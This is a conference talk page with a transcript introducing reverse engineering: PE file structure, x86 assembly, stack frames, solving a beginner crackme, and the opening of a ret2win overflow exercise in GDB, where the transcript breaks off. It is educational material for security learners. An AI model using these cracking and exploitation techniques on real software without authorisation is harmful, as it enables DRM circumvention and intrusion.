Getting Started in Reverse Engineering

Name: Getting Started in Reverse Engineering
Uploaded: 2023-05-28
Duration: 45 min 29 s
Description: An introduction to reverse engineering fundamentals using hands-on analysis of executable files. The talk covers executable formats, linking and loading, x86 assembly basics, stack frames, and practical techniques like string analysis and exploit development, preparing participants for malware analy

BSides Knoxville · 2023 · 45:29 · 461 views · Published 2023-05

Speakers

Marc Messer

Tags

Category: Technical

Topic: CTF, Malware Analysis, Reverse Engineering

Difficulty: Intro

Style: Talk

Mentioned in this talk

Tools used

GDB Ghidra

Frameworks

Pwntools

About this talk

An introduction to reverse engineering fundamentals using hands-on analysis of executable files. The talk covers executable formats, linking and loading, x86 assembly basics, stack frames, and practical techniques like string analysis and exploit development, preparing participants for malware analysis, CTF challenges, and vulnerability research.

Original YouTube description

Spend an hour learning how to analyze executable files for fun and profit. This helps lead into low-level computing, computer architecture, and operating concepts in a hands-on fashion. With a bit of knowledge, you can get started on malware analysis, reverse engineering CTF tasks, vuln research, and more. In this talk I will briefly introduce some fundamental RE concepts and how they relate:
- Going from source code to executable to process
- Executable formats and sections
- Linking and loading
- String analysis
- Basics of reading x86
- Basics of stack frames
- Basic instruction pointer overflow exploit

Transcript [en]

everybody give it up for Marc yes sir

okay um can everybody hear me okay sweet okay um I'll go ahead and get started then um so my name is Marc Messer uh I'm local to Knoxville so I'm super excited to speak to everybody here I used to live like right up the road by Fulton so that's that's how local I am actually um and yeah reverse engineering is a really self-indulgent uh tedious process and I'm thrilled to have a room of people who want to listen to hear me talk about it for a bit so um I don't really have that much of an introduction for myself because kind of the less I talk about work the more fun I can have talking about this but I work in the

defense space primarily in incident response um it's fun we get to see some some novel malware and it puts you in a situation where it's actually useful to have some reverse engineering skills on hand where a lot of times that's sort of fiscally irresponsible you might say um so yeah we'll go ahead and get into it and then um I made a lot of Art and illustrations for this I've been working on this for a while so I'm really excited to present here to you guys um so at a high level what's reverse engineering you know forward engineering is what we normally do where we we have some kind of need for for a thing we go

ahead and we write it we make something and then we have our output and reverse engineering we we don't have all of that information typically we may not have any source code we may just have like a binary you may just see network traffic you may see whatever you know within this I'm mostly going to be talking about just binaries and like um windows executables but we'll get into all that so if we have this binary and we don't have any source code then how are we going to try and learn more about it you know there's the obvious thing of like running it and seeing what happens if we suspect it's malware or something that

might be in a virtual machine or some sort of environment that's designed for us to you know see if it drops a file or opens up network connections something like that you also may do static analysis where you're really just looking at the object itself and seeing what you can sort of glean about its process or properties without even running it so then what's the output like why do we even do any of this for a lot of stuff it's because you want to write YARA when I first got into it it was because I was a teenager and I was interested in cheating in games because I'm

terrible at them but I still like winning um I don't do that as much anymore but extracting intel you might want to learn about your adversaries you might want to um you might have a product that's EOL or something and I don't know if that's legal or not necessarily but you might need to learn more about it so you can continue keeping it around if you absolutely have to um learning to write better malware if you're interested in writing better malware going and looking at a lot of malware is a great way to go about that DRM removal software cracking that kind of stuff I should warn I guess at this point too if you're like a like a really

big evangelist of um DRM software and like terms of service and stuff then there's a really good talk across the way that will probably bore you or bother you a lot less so then another thing of note for this is um due to the tedium it's it's sort of like CTFing if anyone played in any capture the flag events you know CTFs can be very frustrating because you might just get an image or something you don't know if you're supposed to use that for OSINT you don't know if it's like a layered PNG or something and you have to extract a flag from it you know you just have an image and you're told like get me a flag

um that can be just a really overwhelming process and really frustrating and you feel like you fail and so I think there's a few things that you can do to try and make that a little bit easier um so taking what you know and using that to allow yourself to ask questions about what you don't know a lot of times if we're working on an engagement or something we call that like pivoting like we we can say okay we notice this traffic we're going to utilize that see what else we can learn about what's going on um I would say too and this is really helpful for software development as well anything that seems initially

complicated you probably just have to break it into smaller less complicated steps sort of like um sort of like taking like a really complex algorithm or really difficult math problem or something like that you know how do you make it digestible and something that you can actually approach and then failure is something that you just have to be super comfortable with um I would say I'm sort of like the Michael Jordan of failure in a lot of ways in in that you can always learn something out of that failure and just reapproach it and and go again and see what you can do because most of the time if you're just trying to figure out how

something works you know you started out not knowing how it works so it can't it can't get any worse um that's maybe not a good mindset but that's how I think about it but anyhow so so to jump into this we're going to go into a few technical terms and really what I'm hoping to do here is say hey you know there's all these sort of prerequisite topics that you need to to be comfortable saying I might not know everything about this but how do I take enough information of what I do know to start approaching you know the environment in which a process or executable runs um the structure of of that binary itself and then understanding some of

the instructions that are running to to the point where we're essentially looking at a mechanical process at a certain point right when we get down to sort of the electrical engineering aspects of it and we're not really going to go too far into the weeds of that but just know like we're going to introduce a lot of Concepts to show where they matter within the reverse engineering context and it's okay to feel like you still don't understand a lot of stuff because I feel like that every day in reverse engineering is like my daily job um so here we're going to talk about forward engineering really quick so we've got source code on the left

hey look at that we've got source code on the left right over here and we're just doing like a really simple C Hello World um and we know that eventually we have an executable which if we looked at it in a hex editor we would just see like hex output gibberish right um for those of you who've looked at executables before like you might immediately notice like oh this is a PE file like a like a Windows DLL or a Windows EXE something like that and in between we have the compiling process and we have linking um so this is important for us to note because a lot of times when people are trying to reverse engineer stuff you're

just going to look at like decompiling something like that which is a bit of a misnomer right because you you can't really decompile something per se it's been compiled but you are wanting to learn how you can understand that compiled output and maybe think of it in like a C-like fashion where we we have sort of a pseudocode perhaps that that looks like this depending on your goals so once something is compiled say with like GCC or something like that we have this compiled code output that starts to look a little bit more um obtuse is maybe the way to say it so we have we have some instructions that if you've never looked at assembly

before they probably look pretty foreign and if you have looked at assembly before um they still probably look pretty foreign and that's okay um you know we've got some instructions here that we'll talk a little bit about later but right now just don't even sweat it although one thing to note is how many different instructions do we really see here like I I can't count that high so I guess like five or six something like that and we see them kind of repeated so really there's not that much to memorize if you think about it um but so after we have that compiled output we have something called linking and linking is really important because

a lot of times our code isn't necessarily just the code we wrote for example in in this source code right here we have printf hello world and then we you know return to whatever um it's main so I guess it exits the program so that printf for example is not code that we we wrote in there we didn't specify how printf works like we didn't have to go write custom code to go and output something to the console which is what that's doing somewhere in the machine that is referenced and and pulled in so that when we run this executable um it's it's executing this code that we did not write that we symbolically reference with printf so printf is

therefore called a symbol you'll hear uh you'll hear me call that um term out several times and then the the aspect of making that code accessible that we did not write is called linking and so in this context it's going to be talking about um you know like external dlls or something like that that we're not Reinventing the wheel we're not writing our own custom thing you know we're just we're just printing that out um so hex code let's talk a little bit about hex code and why we're using it uh most of you may know this some of you may not but hex we're just talking about something in base 16 that allows us to

shorten things so um as we represent them in sort of binary um methods so so looking at base 10 for example the value 1000 we can see that takes four characters for us to represent and then if we look at the value 1000 in binary it takes a little bit more to represent and unless you're just like a super genius you're not going to look at that binary sequence and be like oh that's a thousand of course some people may be able to do that I definitely am not and then if you're really really sharp you might look at that hex 3e8 and immediately recognize that that's a thousand but why do we really have it

represented that way it's because it's just easier for us to shorten our representations of this information it's also easier for us to read as bytes you know if you combined down here you know these two um whoops these two you know sections 45a and the 9000 you know that's that's a byte so it's it's super easy to just represent everything that way and parse through it and understand what we're looking at um and what does it represent in this context a lot of times it's opcodes so if you think about the actual circuitry on a circuit calling out specific things like moving something from one register to another is going to be like a literal op code
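A small Python sketch of the number-base point made here, not part of the talk itself. It shows the same value, 1000, in binary and in hex, and that each pair of hex digits is exactly one byte. The sample bytes passed to `bytes.fromhex` are picked purely for illustration.

```python
value = 1000

print(bin(value))   # binary form of 1000
print(hex(value))   # hexadecimal form of 1000

# Two hex digits cover exactly one byte (8 bits), which is why hex dumps
# are usually shown as pairs of digits.
raw = bytes.fromhex("4d5a9000")        # sample bytes, chosen for illustration
pairs = [f"{b:02x}" for b in raw]      # one two-digit string per byte
print(pairs)

# Going the other way: parse a hex string back into an integer.
print(int("3e8", 16))
```

Four decimal digits, ten binary digits, or three hex digits all describe the same number; hex just lines up neatly with byte boundaries.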

that's you know a capability of the chip um so B8 05 for example in this which I have over here on the right would be moving to the eax register the value five and the eax register think of that as like a variable space that's just baked onto the chip like it's physically holding those bits um data we'll see some data in there as well just strings of text other values that you parse out from from hex that kind of thing so a little code in getting us a bunch of output before we dive into more of the sort of fun stuff um one of the weird aspects that it took me a bit to understand is like why why

does something like print hello world spit out this like huge assortment of binary you know understanding that you have to have you know stuff linked in and make it run that's still odd um so just note that like a lot of what you see in binaries is actually just meta information that is there so that the binary can be loaded in to the operating system executed and um then you'll be running whatever you want so that said there's a bunch of headers that are in binaries we're going to talk about that that's an important aspect of looking at them and then you'll have different sections within the binary that different different parts of your code are going to be in there so for

example in the hello world you know we had the string of text hello world that's not executing code that's that's a data section so there's going to be a section that literally just holds read-only data and that would be going there and the rest of your code would be in like a different section of the binary the way I think of this is sort of an analogy to books which I have on here of course um if you pick up a book you don't just like flip to the first page and then start reading it and you know wonder who this copyright character is and who the Library of Congress is you're going to know like oh

okay I have to go to a table of contents I'm going to go to whatever and that's where I start and the operating system essentially needs all that type of information too you're also going to have meta information in a book you would have like appendices or something like that think of that like our data sections or relocation tables stuff like that that's that's all going to be an aspect of it so let's talk about portable executable files specifically so um so those are going to be windows executables so most of the time when you see something like that you're going to think like oh I have a exe you know I want to play a steam game or whatever I

run the exe that runs the program you'll also see DLLs they're actually PE files as well and each of these follows a predictable structure because the operating system needs to be able to like pull that into memory and run it obviously so we will actually go and look at a binary in a minute but that structure you know we have something called the MZ header which is there because Windows basically says hey if you try to run this on MS-DOS we don't want it to just kill the system we want this to just spit out a thing saying you can't run this on DOS and then move on so there's actually a DOS program baked into the

front of every single PE just in case you try to run it because Windows is really really dedicated to ensuring backwards compatibility for things that shouldn't exist but um I don't know we're not going to go down that route that's that's a whole talk um so then let's talk a little bit about sections that we're going to see when we look at these so I've already mentioned a little bit about that but so we'll see like a .text section that's where our executable code is we'll see a .data section that's where our you know writable data typically is um read-only data .rdata stuff like that and and really don't feel like you

have to memorize all this stuff I'm constantly referencing documentation um all day like I have books on my desk I have usually a window open with something you know all sorts of stuff so um really it all just kind of comes with familiarity so let's look at an actual PE file headers in here I think this is actually is this legible to people out there thumbs up thumbs down okay cool yeah I wasn't sure what to expect so that's a happy circumstance but um so if we look in here you can see that we have some some bytes that I've called out in certain different colors right and that's because if we're looking at just a raw hex dump of some

of this information then we can tell like oh this this byte over here is referencing that this is a PE file so that when Windows tries to load it it's going to know how to treat that file we'll see um you know let's go see down here we can see the image base that the the code is loaded into and from there we calculate certain things called file offsets in the sense that like we know that this is going to be mapped at some location into memory and that if we take that location that it's mapped into we can see something like the base of code 0x1000 right there and we can know that um you

know a thousand bytes or whatever that represents into the code from whatever that base base location is we can see the beginning of our code so some of this is saying hey you know from wherever this is loaded into memory you count out this many bytes or or you know what have you and therefore you can find certain things um so I think we might even be able to see the address of the code entry point right here and again that's just a that's just a raw thing you can see in the hex dumps so a good way of going into this kind of thing really to familiarize yourself is is in some ways just opening something up in a hex

editor looking at it and seeing what you can figure out which is coincidentally what we are about to do right now so for this I'm just going to pull up a hex editor I'm trying to make all this stuff um concept focused and not really tool focused because like if you're if you want to ask the right questions that matters a lot more than like which hex editor are you doing it in it doesn't it doesn't really matter they they display hex you can go look at it cool what else do you need um and then just referencing whatever you need to so here we have a binary that's from Ophir Harpaz I've linked to

her Twitter later in here but she wrote a site called begin.re that I think was pretty helpful and she had some really nice binaries for beginning to get into analysis so let's take a look at this let's see what we think it's maybe doing and we'll see if we think that we could crack it so here is something called um 010 hex editor okay that doesn't really make much more space but that's fine um so here we can see that we have certain certain header sections called out and just highlighted so here for instance is that MZ header for in case this is loaded into like a DOS machine and then you can even see below that this program

cannot be run in DOS mode and like this this is a full program like if you just cut it out and you run it in a DOS machine it would work and in fact what's kind of funny is you can just change like because it's a hex editor and we can edit this we could just go change that text and have it say whatever we want um it wouldn't really do much for us but that is a possibility but so let's go ahead and take a look and see what sections we have so we see we have a .text section we have our .rdata section so again that's our read-only data section we have a .data section we have resources
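A rough Python sketch, not from the talk, of how the section names seen in the hex editor could be read programmatically. It relies on the documented PE layout: `MZ` at offset 0, the offset of the `PE\0\0` signature stored at 0x3C, a 20-byte COFF header after the signature, then the optional header, then 40-byte section headers whose first 8 bytes are the name. The helper `build_fake_pe` is hypothetical and only builds a non-runnable byte blob so the example is self-contained; the section names are the conventional ones and are assumed here.

```python
import struct


def build_fake_pe(section_names):
    """Build a tiny, NON-runnable blob laid out like the start of a PE file."""
    e_lfanew = 0x40  # offset where the PE signature will sit (assumed for this sketch)
    # 64-byte DOS header: "MZ", padding, then e_lfanew stored at offset 0x3C.
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0 here), Characteristics.
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0)
    # Each section header is 40 bytes; the first 8 hold the zero-padded name.
    sections = b"".join(
        name.encode("ascii").ljust(8, b"\x00") + b"\x00" * 32
        for name in section_names
    )
    return dos + b"PE\x00\x00" + coff + sections


def list_sections(data):
    """Return the section names found in a PE-style byte string."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size  # signature (4) + COFF header (20) + optional header
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        names.append(raw.rstrip(b"\x00").decode("ascii"))
    return names


sample = build_fake_pe([".text", ".rdata", ".data", ".rsrc", ".reloc"])
print(list_sections(sample))
```

To try it on a real file, `list_sections(open(path, "rb").read())` should work for ordinary executables, though this sketch skips all the validation a real parser would need.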

we have relocations so going through and looking in here we can see you know our text is just going to be assembly op codes but let's go ahead and look at our read-only data and see what we can find so in here we've started to see string data that hopefully you guys can see from right here but it's it's just asking us you know hey enter a password and then it has this um very suspicious leetspeak crackme in there who knows what that's for and then it either says correct or wrong password so without knowing hardly anything about this binary I think pretty much everyone in this room could just guess like hey you

enter in some kind of value you compare it to some other value and then you either get a yes or a no and right now I'm pretty sure if we were to just run this executable which we can't because I'm on a Mac and it's an EXE um we would be able to most likely solve this crackme and a lot of a lot of things you look at just going and identifying strings and like the read-only section like if you just pull up your average run-of-the-mill ransomware sample um not to I guess endorse people doing that willy-nilly necessarily but if you did and you just wanted to go and find the ransom note you'll probably see it

just in plain text because whatever whatever method they use to get it onto your system was probably how they worried about hiding it um as you know anything that goes and encrypts everything on your drive is is kind of screaming alarm Bells at that point but anyhow let's go ahead and jump back to the presentation and we're making great time by the way y'all this is fantastic so um please don't run for the doors but we're going to talk about assembly for a little bit and uh hopefully they've chained them by now so people can't escape but we're going to talk about assembly for just a little bit and it's not going to be nearly as bad as it

might have been in college or if you guys are weirdos and learn this for fun um we're basically going to talk about why this looks cool I don't know if anyone remembers in school in like every math class ever they're the people who are just like oh why do we have to learn you know this what how is this ever going to be useful and it's usually like algebra or something where you're like why are you asking this this is applicable to everything but um there's always people like that and I I wish that I would have had teachers who were like hey here is why this is interesting like here's why we should care because that's

sort of part of the point of this it's like why should we ever care about assembly because you can do cool things with it that's frankly the answer um and if you have like a like a violent hatred of dependencies then you will love assembly because you aren't dependent on anything um so assembly what is it um op codes we're going to think of those as individual circuits on the CPU just to just to foot-stomp that again you know like a literal circuit path that is doing a thing it's going to have an op code syntax is usually kind of odd when you think about it before you realize about op codes so you'll have like the

instruction name like move a value and then you'll have the destination it's supposed to go to like a register such as eax and then you'll have your source operand which is let's say the number five like we had on our first thing of you know moving the value five to eax why we say it that way is because move something to eax register is a literal circuit so it makes more sense to represent it that way um certain disturbed individuals prefer AT&T syntax which is um essentially saying like the the opposite saying like you know move the value 5 into eax and that's fine but um don't don't don't ever do that nobody

likes that um so registers we're going to think of registers as values uh variables again that we've got just baked onto the chip right and there's stuff like micro code too so like this this all goes down huge rabbit holes but um I'm going for Concepts more than I'm going for like hard accuracy so those registers in 32-bit assembly you have eax for example we'll talk about what that's for and it's 32 bits wide holds a 32-bit value because we're talking about 32-bit assembly and if you're using 32 bits of memory space and you pass it a 128-bit value then um in technical terms everything gets broken so we are going to just talk about

things in 32-bit space some of these can be shortened into smaller registers for example um if you were just using 16-bit you would have ax and if you just wanted to ensure that a value stayed in the 16-bit register even in 32-bit assembly you could pass it something like ax we also have some indices and pointers for the sake of time we're just going to talk about the pointers so ESP for example and EBP maintain our position on the stack and everything on a computer that runs is essentially recursive so you have when you when you turn something on like a your computer or whatever and you then open up a new process that process was opened by

something else like there's no there's no Island process that just doesn't have something that started it um so therefore we're sort of just going to recursively call things through the stack and work our way back and again that's all nebulous I've done a very confusing illustration and we'll get to that sometime soon as well so let's talk a little bit more about those registers and some of our flags and pointers stuff like that so eax think of this as I just think of it as the accumulator register because of the a frankly just makes it easier stands for extended that's the e in all of these so we're often going to use that to store like return values after a

function um the base register often holds function parameters index addresses that kind of thing ECX if you've ever written any code you know think of that as your counter you might have a variable called I for iterations or whatever that you use all the time edx you know whatever passive data and a lot of what I'm writing about function is really just dependent on how like compilers behave because um that's they sort of have intended functions but it's just a part of a machine and you can really use it for anything if you're just writing assembly but um there's also flags and flags are really important because you aren't usually directly changing a flag or seeing a flag directly change in

my opinion like you don't necessarily see something like a zero flag just like move the value one into zero flag you usually have something like a comparison that goes and changes these flags so so think about stuff like Boolean types where you want to know if something is true or false or you want to do like if or else like I want to do this and if this is set this way then I'm going to do something else instead so if we have a function in assembly functions the wrong term but whatever I'm already going like compare the eax and edx values then if the eax and edx values are equal then it's just going to

stay as zero so that way if you have some kind of comparison later then the the zero flag is checked and if the zero flag is one thing or the other then it may do something like jump so the the next um the next function here is just jump not equal and that's essentially saying okay well this wasn't set to this just like an if else function therefore we're going to jump to this location in memory so 40154B in this in this case referencing a memory location so there's a few different flags for checking to see if a result is negative for example or checking to see if you've overflowed a register or something like

that then those flags get set for that purpose so let's talk about the toughest part of this to learn and really it comes with familiarity it's going to seem confusing it confused me for months and I'm still going to be confused trying to explain it because it's it's pretty detailed and really the best way that I found for just getting familiar with how the um stack works in assembly tends to just be I go to YouTube and I just watch people mechanically um you know shift stuff around kind of like Towers of Hanoi until it's a little bit easier to understand but so the stack is a last in first out data structure that is

um in more friendly terms think of it like a deck of cards if you are putting something on top of the deck and someone else has to draw from the top of the deck because nobody draws from the bottom of the deck then they're just going to to pull the last thing you put in there so it's it's always going to work like that there's heaps which are different we're not even going to talk about heaps but so at a high level how does the stack work we're going to push our variables onto the stack in reverse order if we need variables for a function that's being called um the something called EBP the base

pointer is then pushed onto the stack next to help us tell where our function begins and know where we are in memory space essentially EBP is then assigned the value of ESP which is the pointer to the top of the stack so at this point they're equivalent because we haven't really done anything with our function and then as we move throughout the stack say pushing or popping values onto it then ESP is going to shift with it um and then after we're done with everything EBP that base pointer is popped from the stack and we return to the memory location where that function was called and again that's at a high level don't worry too much because we're

going to look at it in detail um so in simple high level terms we save where we came from and then we use our EBP and ESP registers to keep track of what we're doing because you have to have some method for accounting in memory uh once you're working on things at a fairly low level so let's go through this with an example and we'll just talk about this code really quick we are going to essentially start in this example that I run through where we call this uh subtract function and the subtract function is just defined as taking two integers creating a space to store an output and then we are going to subtract one from the other and return

that saved output so um pretty simple right there and now let's make it really confusing by looking at it in assembly so here we have the scene set for a function you're going to notice right here push EBP move EBP ESP if you if you ever have to look at assembly and you just remember one thing from this talk every single time you see that a new function is being called because that's setting the scene for a function to be called so here I have a memory stack that I've I've written and I just have this in in in four byte increments sort of uh decreasing and increasing so I like to think of the stack as counting down
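A toy Python model of the stack mechanics described so far, offered as a sketch rather than as what the compiler or the slides actually do. The class name `Stack32`, the start address 0x1000, the return address 0x401000, and the argument values are all made up for illustration. The stack counts down in 4-byte steps, arguments go on in reverse order, and the `push ebp` / `mov ebp, esp` pair sets the scene for the function.

```python
class Stack32:
    """Toy model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, top=0x1000):      # arbitrary, made-up starting address
        self.mem = {}                    # address -> 32-bit value
        self.esp = top                   # stack pointer: address of the latest push
        self.ebp = top                   # base pointer: anchor of the current frame

    def push(self, value):
        self.esp -= 4                    # pushing moves esp down by 4 bytes
        self.mem[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        value = self.mem.pop(self.esp)
        self.esp += 4                    # popping moves esp back up by 4 bytes
        return value


s = Stack32()
caller_ebp = s.ebp

s.push(10)            # second argument (b) goes on first: reverse order
s.push(5)             # first argument (a)
s.push(0x401000)      # hypothetical return address, standing in for what a call saves

s.push(s.ebp)         # push ebp: save the caller's base pointer
s.ebp = s.esp         # mov ebp, esp: both now mark the start of this frame

a = s.mem[s.ebp + 8]  # arguments sit above the saved ebp and the return address
b = s.mem[s.ebp + 12]
result = a - b

s.ebp = s.pop()       # pop ebp: restore the caller's base pointer
return_to = s.pop()   # returning pops the saved return address
print(hex(s.esp), a, b, result, hex(return_to))
```

Because every access is relative to `ebp`, the function never needs to know the absolute address it landed on, only fixed offsets from where its frame began.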

because I think it's easier to illustrate if you watch videos of people doing like stack mechanics stuff a lot of times they do it the other way but um whatever is easiest for you to understand I think is the way to do it so let's let's go to where our function is calling again that subtract function and so we need to push those variables onto the stack right so we're pushing our variables onto the stack and then they are showing up in the stack right here we're pushing five for integer a we're pushing 10 for integer B and every single time we push our our ESP is rising a little bit and so then we call subtract so that pushes the

return address of the function that called this and then it jumps to the function address of the subtract function so let's pretend we've just jumped over to there and we're going to push EBP move EBP ESP um setting up our pointers so that we can begin so we have those um we have those variables on the stack and we we pushed EBP and we moved EBP ESP so let's say that now we want to add some registers to hold integer a and to hold integer B um this is not necessarily a guaranteed 100% copy of how a compiler works but at a simple level I think it's just an easy way to understand it so we're

saying okay we want some memory space to hold those values so we're just going to push them onto the stack and each time we do that that's going to automatically move ESP because assembly is cool that way so then because we know uh you know hypothetically when we wrote this function that we're pushing two values of a certain um you know 32-bit space we know that we can basically move these values from a predictable location relative to our function start into EDX and ECX so that we have those values accounted for so we've um we've loaded those integers that we passed into EBP and EDX or pardon me into EDX and ECX over here um and so then we're saying okay well I

want to reserve some memory so that I can save what we're returning so we're going to subtract 4 bytes from ESP and that just allocates this empty memory space that we can then store a value in so now we're going to perform that function um again to notice I think I've called this out a couple times but we're not actually you know moving ESP for the most part on our own every single time we push something onto the stack you know we're not saying oh we need to move ESP so we don't lose count the nice thing is that as a function of pushing and popping ESP moves for us but anyhow so here we have our actual

subtraction and we want to subtract ECX from EDX so that's our a minus b and then we're storing that value in ECX because again every value has to have a place to go and then simply you can't do something like subtract 5 from 10 because where are you going to store that value again at this point we're talking about like a mechanical device um so then we want to store that value to a location so that we can copy it to EAX and return with it so that's what we're doing here we're moving the ECX value into that integer c location where ESP is marking and then we're saving that value into EAX because after all of this

is done and we pull all of this off we want that value to be able to be referenced by the program otherwise the entire function call was useless so here we're going to clean up and return and it's still probably going to feel somewhat confusing and that's totally okay um so we're going to add four bytes to ESP again this moves up and down here so that's moving it back up we're going to pop ECX we don't need it anymore we're going to pop EDX because we don't need that anymore and then we are going to just use the instruction leave which pops our base pointer and then once we return we return to the address that ESP

is pointing to AKA return address right here and that would be us jumping back to main in that original example and therefore having performed our function okay so now we feel super confident about assembly we've learned everything that you learn in you know a master's degree class or whatever um you know I'm sure that's basically all they cover and we're just going to see if we can use that to take a look at that same executable that we looked at previously and in here we're going to go look at it in IDA Free um yikes here we're going to close IDA and we are going to restart IDA
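The stack frame walkthrough above (push the arguments, call, push EBP, mov EBP ESP, reserve a local, leave, return) can be sketched as a toy model in Python. This is only an illustration and not a CPU emulator: the `Stack` class, the starting address `0x1000`, the return address `0x08048500` and the saved base pointer `0xBFFF0000` are all made-up values, and the sketch skips the extra push and pop of EDX and ECX that the slides show.

```python
# Toy model of the 32-bit stack frame walkthrough; not a real emulator.
class Stack:
    def __init__(self, top=0x1000):
        self.mem = {}      # address -> 32-bit value
        self.esp = top     # stack pointer, moves down on every push
        self.ebp = 0       # base pointer of the current frame

    def push(self, value):
        self.esp -= 4      # push moves ESP down by one 4-byte slot
        self.mem[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4      # pop moves ESP back up
        return value


def call_subtract(a, b, return_address=0x08048500):
    s = Stack()
    s.ebp = 0xBFFF0000     # hypothetical base pointer belonging to main

    # caller: push the arguments, then "call" pushes the return address
    s.push(b)
    s.push(a)
    s.push(return_address)

    # callee prologue: push ebp ; mov ebp, esp
    s.push(s.ebp)
    s.ebp = s.esp

    # the arguments now sit at predictable offsets from EBP
    edx = s.mem[s.ebp + 8]     # a
    ecx = s.mem[s.ebp + 12]    # b

    # sub esp, 4 reserves one local slot for the result
    s.esp -= 4
    s.mem[s.ebp - 4] = (edx - ecx) & 0xFFFFFFFF
    eax = s.mem[s.ebp - 4]     # the return value travels back in EAX

    # epilogue: leave (mov esp, ebp ; pop ebp), then ret pops the return address
    s.esp = s.ebp
    s.ebp = s.pop()
    return_to = s.pop()
    return eax, return_to, s.ebp


eax, return_to, ebp = call_subtract(10, 5)
```

Calling `call_subtract(5, 10)` instead leaves `0xFFFFFFFB` in `eax`, which is how minus five looks as a 32-bit two's complement value.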

excellent and we're back this is how technically proficient I am that was effortless okay so here we have some instructions we can see those um those string values that we were looking at before and so again we're probably just like oh we see like a bunch of different values that we don't know you know what these do I don't know what these instructions mean whatever um so let's not panic really quick let's look at these instructions and we see okay we see mov xor push load effective address call that's what like five instructions there's a test and a jump not zero and an add and so I'm not saying you'll never have to look anything up but what I am

saying is that like the the amount of instructions that you need to actually like eventually learn and understand is not this like insurmountable amount like what looks like gibberish when you realize like oh I actually only need to pay attention to certain aspects of this to get some kind of information out of this that's actionable um it's really not that much so we see here that the string enter password is pushed onto the stack and then we see that a subroutine is called so if we had to guess knowing what we know now that subroutine is probably what's printing that to the screen so we know that if you're going to execute some kind of function you have to push

your variables beforehand and then we see that happen again down here for um for crack me you know we see crack me pushed onto the stack we see the string that would have been entered as string one also pushed onto the stack and so then we see a call for a string comparison so there we know okay this is asking me for a password this is telling me like Okay um I have I have this input I want to compare it and then after that we jump based off of whether or not that worked and so then we can see okay well we jump either to correct or wrong password and we don't even have to run this we

literally know like it's it's comparing whatever we input to crack me and if it's not equal then it goes to wrong password so that's one that's one function and granted things are a lot easier when you have like nice strings kind of telling you what's going on but really to start getting into looking at things like this you don't need a bunch of fancy education like I I literally don't have any reverse engineering training I don't have a computer science degree um I think I still have a valid Security Plus which I should probably check because I might need it for my job but um I do the job too that always shocks me but anyhow
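The logic read out of the disassembly above (push two strings, call a string comparison, test the result, jump if not zero) can be written back out as a few lines of Python. This is a rough reconstruction for illustration only: the function names, the exact spelling of the expected password and the register named in the comment are assumptions and were not shown in the talk.

```python
def strcmp(a, b):
    """Rough stand-in for C strcmp: 0 when equal, nonzero otherwise."""
    if a == b:
        return 0
    return -1 if a < b else 1


def check_password(user_input, expected="crackme"):
    # both strings are pushed onto the stack, then the comparison is called
    result = strcmp(user_input, expected)
    # test / jump-not-zero: a nonzero result takes the "wrong password" branch
    if result != 0:
        return "wrong password"
    return "correct"
```

Reading the two pushed strings and the branch targets is enough to recover this without ever running the binary.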

let's go back to our PowerPoint because we have 10 minutes and the cool stuff is just around the corner so um so we're going to do a ROP chain because why are we doing any of this like what's the point if we're just learning something about something we're like well cool this is how this works see you later you know there's always a reason it's never just um you know this exercise that you're just doing for no reason you always have some kind of output so um so here we're going to talk about a ret2win binary and the point of these is that you have a function that's like an

island function maybe it's not referenced anywhere in the binary and you want the program to jump to that function even if running the function just as normal um it would never pop up and that'll make a little bit more sense when we actually look at the assembly and it will make sense because we're all confident and feeling great so with some initial recon on this binary let's just say that we found some function names like main pwnme and ret2win and for this too you'll see that I'm using um GDB which is the GNU debugger with pwndbg installed and pwntools in Python 2 because Python 3 is really annoying for exploit development

um to put it bluntly like it just it doesn't print to bytes natively and it's irritating so um so yeah let's go use some deprecated software that we're not supposed to use and this is going to be an ELF file which is a Linux executable why that's noteworthy is because it's going to be little endian um endianness is something that we didn't really go into but just think of the number I have here 31 we can say that this is written big endian because the most significant digit comes first the three represents three tens and that's bigger than the one which represents one one so the one is the

least significant digit however if we were using a computer that stored 31 as something like 13 where we were parsing it as like okay the first number is the least significant meaning just the digit one and the next number is the most significant which is the tens that we're summing then we would say that that was little endian because the largest value number would be at the end there but anyhow so let's go ahead and look at our main function again we see some stuff that's not super exciting we just see um we see a bunch of instructions that maybe we'd have to look up and then we see that we call a

function we call another function we call another function and we jump to that pwnme function and then we call another function so these functions by the way we have something setting a buffer uh puts at PLT the procedure linkage table um is just outputting to the screen it's like printf think of it that way and then we have pwnme so let's go look at pwnme in pwnme you know if this was something that we didn't have to solve anything it would eventually jump to that ret2win function and we wouldn't have to worry about any of this but we don't see that it jumps to ret2win at all we actually just see that

it sets some memory outputs to the screen a handful of times outputs to the screen again reads some input outputs to the screen and returns to main and so after it returns to main then the function just ends so let's look at that ret2win function again we didn't find any references to this function so if we just run that binary this code is never going to run um so we see output to the screen we see a call to system here so system at PLT the procedure linkage table um and then it just ends so let's look at some GDB input this is interesting because you can see your stack values as you step through a

program you can see the actual assembly that's being run or pardon me this is your stack values at the bottom and you can see your registers at the top so this is just us looking at the main function here why do we see shell bin bash because again everything is recursive on a computer that's where we literally ran this from was just from the shell so that's why we see that so we don't see anything interesting whatever let's just continue running the program so here we jump to pwnme and um you know again we don't see that much we can see the instruction pointer here you know pulling our next instruction that we're going to jump to

